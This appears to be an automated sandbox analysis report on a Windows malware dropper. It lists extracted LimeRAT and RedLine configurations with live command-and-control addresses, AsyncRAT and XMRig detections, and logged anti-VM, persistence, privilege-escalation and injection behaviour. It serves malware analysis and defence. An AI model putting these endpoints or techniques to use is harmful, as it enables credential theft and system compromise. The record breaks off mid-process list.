Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
06-09-2022 03:04
Behavioral task
behavioral1
Sample
a18193c95d0c31ab132d9bc2da884d7c.exe
Resource
win10-20220812-en
Behavioral task
behavioral2
Sample
a18193c95d0c31ab132d9bc2da884d7c.exe
Resource
win10v2004-20220812-en
General
-
Target
a18193c95d0c31ab132d9bc2da884d7c.exe
-
Size
22.0MB
-
MD5
a18193c95d0c31ab132d9bc2da884d7c
-
SHA1
063e58b4b3b920e68006d4d28625df894e20750a
-
SHA256
6d6ebf1870d5d9c6bfebdc9fee3a3f381f86b32770f34df41364f905a489486c
-
SHA512
1c5119a13ddbbe2293759e5cd66de8747abba98d46aa9883c1ccadb489a2cf54be58766aa157fd383a6f631c9265d7b873c068fd992c6dc592ab32a6afd10547
-
SSDEEP
393216:TJWrtpiMPeMNKxIyMMUGJQmNVmIRKGl5X1+moeWJIYR22uYZm:kpWMtMUJ+KG3XsmOZFpm
Malware Config
Extracted
limerat
-
aes_key
123
-
antivm
true
-
c2_url
https://pastebin.com/raw/mchxnAbT
-
delay
80
-
download_payload
false
-
install
true
-
install_name
WindosCert.exe
-
main_folder
AppData
-
pin_spread
true
-
sub_folder
\
-
usb_spread
true
Extracted
redline
193.106.191.16:28958
62.204.41.141:24758
193.106.191.106:26883
193.124.22.40:19788
-
auth_value
057b2256d154683c7559f6a91f04717e
Extracted
redline
@Miroskati
litrazalilibe.xyz:81
-
auth_value
384ebbf9bd4d7e80bf3269909b298f87
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 5 IoCs
resource yara_rule behavioral2/memory/437032-226-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/199320-238-0x0000000000390000-0x00000000003B0000-memory.dmp family_redline behavioral2/memory/287380-244-0x0000000000370000-0x0000000000390000-memory.dmp family_redline behavioral2/memory/14152-249-0x0000000000510000-0x000000000056D000-memory.dmp family_redline behavioral2/memory/116408-252-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
Async RAT payload 5 IoCs
resource yara_rule behavioral2/files/0x0008000000022dfa-137.dat asyncrat behavioral2/files/0x0008000000022dfa-138.dat asyncrat behavioral2/memory/540-146-0x0000000000C00000-0x0000000000C22000-memory.dmp asyncrat behavioral2/files/0x0007000000022e68-361.dat asyncrat behavioral2/files/0x0007000000022e68-362.dat asyncrat -
Enumerates VirtualBox registry keys 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF 3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest 3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo 3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest COM Surrogate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService COM Surrogate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse 3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService 3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF COM Surrogate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse COM Surrogate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo COM Surrogate.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ 3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ 3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ COM Surrogate.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ COM Surrogate.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ COM Surrogate.exe -
Looks for VirtualBox Guest Additions in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions 3.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions COM Surrogate.exe -
XMRig Miner payload 3 IoCs
resource yara_rule behavioral2/memory/407316-346-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/407316-347-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/407316-350-0x0000000140000000-0x0000000140809000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts updater.exe File opened for modification C:\Windows\system32\drivers\etc\hosts 6.exe -
Executes dropped EXE 22 IoCs
pid Process 540 1.exe 2148 2.exe 100 3.exe 4168 5.exe 4976 6.exe 5928 7.exe 7864 9.exe 14084 11.exe 14184 10.exe 14152 8.exe 18688 v0.7.exe 107740 Setup.exe 135120 Setup.exe 161724 SLAYER Leecher v0.7 .exe 187028 svchost.exe 198272 svchost.exe 213364 svchost.exe 244212 svchost.exe 399940 COM Surrogate.exe 406676 updater.exe 408088 WindosCert.exe 408144 UpdateChromeDay.exe -
Possible privilege escalation attempt 4 IoCs
pid Process 405704 takeown.exe 405828 icacls.exe 407412 takeown.exe 407428 icacls.exe -
Stops running service(s) 3 TTPs
-
resource yara_rule behavioral2/memory/2556-133-0x0000000000400000-0x0000000003579000-memory.dmp vmprotect behavioral2/memory/2556-132-0x0000000000400000-0x0000000003579000-memory.dmp vmprotect behavioral2/files/0x0008000000022e2a-142.dat vmprotect behavioral2/files/0x0008000000022e2a-143.dat vmprotect behavioral2/memory/100-167-0x0000000140000000-0x000000014085E000-memory.dmp vmprotect behavioral2/memory/2556-184-0x0000000000400000-0x0000000003579000-memory.dmp vmprotect behavioral2/memory/100-218-0x0000000140000000-0x000000014085E000-memory.dmp vmprotect behavioral2/files/0x0006000000022e4b-269.dat vmprotect behavioral2/memory/100-271-0x0000000140000000-0x000000014085E000-memory.dmp vmprotect behavioral2/files/0x0006000000022e4b-268.dat vmprotect behavioral2/memory/399940-274-0x0000000140000000-0x000000014085E000-memory.dmp vmprotect behavioral2/memory/399940-279-0x0000000140000000-0x000000014085E000-memory.dmp vmprotect behavioral2/memory/399940-284-0x0000000140000000-0x000000014085E000-memory.dmp vmprotect -
Checks computer location settings 2 TTPs 10 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation Setup.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation 1.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation 3.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation 5.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation a18193c95d0c31ab132d9bc2da884d7c.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation 6.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation v0.7.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation Setup.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation svchost.exe -
Modifies file permissions 1 TTPs 4 IoCs
pid Process 405704 takeown.exe 405828 icacls.exe 407412 takeown.exe 407428 icacls.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Intel Security Corporation = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\svchost.exe" Setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Intel Security Corporation = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\svchost.exe" Setup.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 4 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\updater.exe.log updater.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 100 3.exe 399940 COM Surrogate.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 7864 set thread context of 437032 7864 9.exe 117 PID 14084 set thread context of 199320 14084 11.exe 119 PID 14152 set thread context of 287380 14152 8.exe 120 PID 2148 set thread context of 116408 2148 2.exe 121 PID 5928 set thread context of 399728 5928 7.exe 122 PID 406676 set thread context of 407316 406676 updater.exe 189 -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Chrome\updater.exe powershell.exe File opened for modification C:\Program Files\Google\Chrome\updater.exe powershell.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 405180 sc.exe 405276 sc.exe 405364 sc.exe 405440 sc.exe 407104 sc.exe 407136 sc.exe 407176 sc.exe 405092 sc.exe 407084 sc.exe 407160 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 200044 161724 WerFault.exe 109 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 407972 schtasks.exe 408028 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 407992 timeout.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ 3.exe -
Modifies registry key 1 TTPs 18 IoCs
pid Process 407216 reg.exe 407308 reg.exe 405476 reg.exe 405584 reg.exe 406104 reg.exe 407480 reg.exe 405520 reg.exe 407384 reg.exe 407448 reg.exe 405552 reg.exe 405628 reg.exe 406072 reg.exe 407396 reg.exe 407464 reg.exe 407496 reg.exe 406144 reg.exe 406188 reg.exe 407260 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 100 3.exe 100 3.exe 2572 powershell.exe 2572 powershell.exe 100 3.exe 100 3.exe 22480 powershell.exe 22480 powershell.exe 2572 powershell.exe 2572 powershell.exe 2572 powershell.exe 22480 powershell.exe 22480 powershell.exe 399940 COM Surrogate.exe 399940 COM Surrogate.exe 199320 AppLaunch.exe 199320 AppLaunch.exe 116408 AppLaunch.exe 116408 AppLaunch.exe 399940 COM Surrogate.exe 399940 COM Surrogate.exe 437032 AppLaunch.exe 437032 AppLaunch.exe 4976 6.exe 4976 6.exe 405724 powershell.exe 405724 powershell.exe 405724 powershell.exe 406252 powershell.EXE 406252 powershell.EXE 406744 powershell.exe 406744 powershell.exe 406676 updater.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe 407316 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 652 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2572 powershell.exe Token: SeDebugPrivilege 22480 powershell.exe Token: SeDebugPrivilege 213364 svchost.exe Token: SeDebugPrivilege 244212 svchost.exe Token: SeDebugPrivilege 199320 AppLaunch.exe Token: SeDebugPrivilege 116408 AppLaunch.exe Token: SeDebugPrivilege 437032 AppLaunch.exe Token: SeShutdownPrivilege 405136 powercfg.exe Token: SeCreatePagefilePrivilege 405136 powercfg.exe Token: SeDebugPrivilege 4976 6.exe Token: SeShutdownPrivilege 405212 powercfg.exe Token: SeCreatePagefilePrivilege 405212 powercfg.exe Token: SeShutdownPrivilege 405320 powercfg.exe Token: SeCreatePagefilePrivilege 405320 powercfg.exe Token: SeShutdownPrivilege 405388 powercfg.exe Token: SeCreatePagefilePrivilege 405388 powercfg.exe Token: SeTakeOwnershipPrivilege 405704 takeown.exe Token: SeDebugPrivilege 405724 powershell.exe Token: SeIncreaseQuotaPrivilege 405724 powershell.exe Token: SeSecurityPrivilege 405724 powershell.exe Token: SeTakeOwnershipPrivilege 405724 powershell.exe Token: SeLoadDriverPrivilege 405724 powershell.exe Token: SeSystemProfilePrivilege 405724 powershell.exe Token: SeSystemtimePrivilege 405724 powershell.exe Token: SeProfSingleProcessPrivilege 405724 powershell.exe Token: SeIncBasePriorityPrivilege 405724 powershell.exe Token: SeCreatePagefilePrivilege 405724 powershell.exe Token: SeBackupPrivilege 405724 powershell.exe Token: SeRestorePrivilege 405724 powershell.exe Token: SeShutdownPrivilege 405724 powershell.exe Token: SeDebugPrivilege 405724 powershell.exe Token: SeSystemEnvironmentPrivilege 405724 powershell.exe Token: SeRemoteShutdownPrivilege 405724 powershell.exe Token: SeUndockPrivilege 405724 powershell.exe Token: SeManageVolumePrivilege 405724 powershell.exe Token: 33 405724 powershell.exe Token: 34 405724 powershell.exe Token: 35 405724 powershell.exe Token: 36 405724 powershell.exe Token: SeIncreaseQuotaPrivilege 405724 powershell.exe Token: SeSecurityPrivilege 405724 powershell.exe Token: SeTakeOwnershipPrivilege 405724 powershell.exe Token: SeLoadDriverPrivilege 405724 powershell.exe Token: SeSystemProfilePrivilege 405724 powershell.exe Token: SeSystemtimePrivilege 405724 powershell.exe Token: SeProfSingleProcessPrivilege 405724 powershell.exe Token: SeIncBasePriorityPrivilege 405724 powershell.exe Token: SeCreatePagefilePrivilege 405724 powershell.exe Token: SeBackupPrivilege 405724 powershell.exe Token: SeRestorePrivilege 405724 powershell.exe Token: SeShutdownPrivilege 405724 powershell.exe Token: SeDebugPrivilege 405724 powershell.exe Token: SeSystemEnvironmentPrivilege 405724 powershell.exe Token: SeRemoteShutdownPrivilege 405724 powershell.exe Token: SeUndockPrivilege 405724 powershell.exe Token: SeManageVolumePrivilege 405724 powershell.exe Token: 33 405724 powershell.exe Token: 34 405724 powershell.exe Token: 35 405724 powershell.exe Token: 36 405724 powershell.exe Token: SeIncreaseQuotaPrivilege 405724 powershell.exe Token: SeSecurityPrivilege 405724 powershell.exe Token: SeTakeOwnershipPrivilege 405724 powershell.exe Token: SeLoadDriverPrivilege 405724 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2556 wrote to memory of 2572 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 86 PID 2556 wrote to memory of 2572 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 86 PID 2556 wrote to memory of 2572 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 86 PID 2556 wrote to memory of 540 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 88 PID 2556 wrote to memory of 540 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 88 PID 2556 wrote to memory of 540 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 88 PID 2556 wrote to memory of 2148 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 89 PID 2556 wrote to memory of 2148 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 89 PID 2556 wrote to memory of 2148 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 89 PID 2556 wrote to memory of 100 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 91 PID 2556 wrote to memory of 100 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 91 PID 2556 wrote to memory of 4168 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 92 PID 2556 wrote to memory of 4168 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 92 PID 2556 wrote to memory of 4168 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 92 PID 2556 wrote to memory of 4976 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 96 PID 2556 wrote to memory of 4976 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 96 PID 2556 wrote to memory of 5928 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 95 PID 2556 wrote to memory of 5928 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 95 PID 2556 wrote to memory of 5928 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 95 PID 2556 wrote to memory of 7864 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 93 PID 2556 wrote to memory of 7864 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 93 PID 2556 wrote to memory of 7864 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 93 PID 2556 wrote to memory of 14084 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 97 PID 2556 wrote to memory of 14084 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 97 PID 2556 wrote to memory of 14084 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 97 PID 2556 wrote to memory of 14184 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 104 PID 2556 wrote to memory of 14184 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 104 PID 2556 wrote to memory of 14184 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 104 PID 2556 wrote to memory of 14152 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 103 PID 2556 wrote to memory of 14152 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 103 PID 2556 wrote to memory of 14152 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 103 PID 2556 wrote to memory of 18688 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 100 PID 2556 wrote to memory of 18688 2556 a18193c95d0c31ab132d9bc2da884d7c.exe 100 PID 4976 wrote to memory of 22480 4976 6.exe 101 PID 4976 wrote to memory of 22480 4976 6.exe 101 PID 18688 wrote to memory of 107740 18688 v0.7.exe 107 PID 18688 wrote to memory of 107740 18688 v0.7.exe 107 PID 18688 wrote to memory of 135120 18688 v0.7.exe 108 PID 18688 wrote to memory of 135120 18688 v0.7.exe 108 PID 18688 wrote to memory of 161724 18688 v0.7.exe 109 PID 18688 wrote to memory of 161724 18688 v0.7.exe 109 PID 107740 wrote to memory of 187028 107740 Setup.exe 110 PID 107740 wrote to memory of 187028 107740 Setup.exe 110 PID 107740 wrote to memory of 187028 107740 Setup.exe 110 PID 135120 wrote to memory of 198272 135120 Setup.exe 112 PID 135120 wrote to memory of 198272 135120 Setup.exe 112 PID 135120 wrote to memory of 198272 135120 Setup.exe 112 PID 187028 wrote to memory of 213364 187028 svchost.exe 114 PID 187028 wrote to memory of 213364 187028 svchost.exe 114 PID 198272 wrote to memory of 244212 198272 svchost.exe 116 PID 198272 wrote to memory of 244212 198272 svchost.exe 116 PID 7864 wrote to memory of 437032 7864 9.exe 117 PID 7864 wrote to memory of 437032 7864 9.exe 117 PID 7864 wrote to memory of 437032 7864 9.exe 117 PID 7864 wrote to memory of 437032 7864 9.exe 117 PID 7864 wrote to memory of 437032 7864 9.exe 117 PID 14084 wrote to memory of 199320 14084 11.exe 119 PID 14084 wrote to memory of 199320 14084 11.exe 119 PID 14084 wrote to memory of 199320 14084 11.exe 119 PID 14084 wrote to memory of 199320 14084 11.exe 119 PID 14152 wrote to memory of 287380 14152 8.exe 120 PID 14152 wrote to memory of 287380 14152 8.exe 120 PID 14152 wrote to memory of 287380 14152 8.exe 120 PID 14084 wrote to memory of 199320 14084 11.exe 119
Processes
-
C:\Users\Admin\AppData\Local\Temp\a18193c95d0c31ab132d9bc2da884d7c.exe"C:\Users\Admin\AppData\Local\Temp\a18193c95d0c31ab132d9bc2da884d7c.exe"1⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2556 -
